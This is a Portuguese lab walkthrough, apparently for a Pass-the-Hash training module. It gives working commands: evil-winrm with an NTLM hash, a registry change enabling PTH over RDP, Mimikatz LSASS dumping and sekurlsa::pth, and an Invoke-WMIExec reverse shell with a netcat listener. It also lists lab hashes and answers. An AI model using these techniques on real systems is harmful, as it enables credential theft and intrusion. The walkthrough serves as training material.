# Questions 1. Acesse a máquina alvo usando qualquer ferramenta Pass-the-Hash. Envie o conteúdo do arquivo localizado em C:\pth.txt. * **Pass the Hash with evil-winrm (Linux)** ``` evil-winrm -i 10.129.204.23 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453 ```

*** 2. Tente conectar-se via RDP usando o hash de Administrador. Qual é o nome do valor do registro que deve ser definido como 0 para que o PTH sobre RDP funcione? Altere o valor da chave do registro e conecte-se usando o hash com o RDP. Envie o nome do valor do registro como resposta. * Na mesma conexão com o evil-winrm, podemos desativar o modo restrito e tentar o RDP ``` reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f ``` *** 3. Conecte-se via RDP e use o Mimikatz, localizado em c:\tools, para extrair os hashes presentes na sessão atual. Qual é o hash NTLM/RC4 da conta de David? * Dump LSASS: ``` privilege::debug token::elevate sekurlsa::logonpasswords ```

*** 4. Utilizando o hash de David, realize um ataque Pass the Hash para conectar-se à pasta compartilhada \DC01\david e ler o arquivo david.txt. ``` mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe" exit ``` * Na abertura de um novo terminal, busque pelo arquivo ``` type \\dc01\david\david.txt ``` * O processo é o mesmo para a pergunta 5 *** 5. Usando o hash de Julio, execute um ataque Pass the Hash, abra um console do PowerShell e importe o cmdlet Invoke-TheHash para criar um shell reverso na máquina à qual você está conectado via RDP (a máquina alvo, DC01, só pode se conectar à MS01). Use a ferramenta nc.exe localizada em c:\tools para monitorar o shell reverso. Uma vez conectado à DC01, leia a flag em C:\julio\flag.txt. * Imagine um cenário, basicamente tu já tens acesso ao MS01, que seria a nossa janela A, e você pretende chegar ao DC01, janela B * Na *janela B* : Execute o ouvinte netcat, que aguardará o shell reverso vindo do DC01. ``` .\nc.exe -lvp 4444 ``` * Antes de criar o payload, verifiquei as interfaces de rede do MS01 com o ipconfig. * O próximo passo é gerar um payload de shell reverso em PowerShell. Para isso, acesse: [**https://www.revshells.com**](https://www.revshells.com/) **e** escolha: * LHOST: **172.16.1.5** (seu IP MS01) * LPORT: **4444**

* De volta à pasta Invoke-TheHash, carreguei o módulo com Import-Module .\Invoke-TheHash.psd1 e, em seguida, usei o WMIExec para executar um comando no DC01, passando o hash NTLM de Julio para autenticação. O comando que executei foi o payload do PowerShell em Base64. ``` Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e " ``` * O Invoke-TheHash informou que o comando foi executado no DC01, o que significa que o shell reverso deve se reconectar imediatamente. * Volte para a Janela B (Netcat). Seu shell reverso deverá aparecer lá:

*** 6. Opcional: John é membro do grupo Usuários de Gerenciamento Remoto do MS01. Tente conectar-se ao MS01 usando o hash da conta de John com o impacket. Qual o resultado? O que acontece se você usar o evil-winrm? Marque como CONCLUÍDO ao terminar.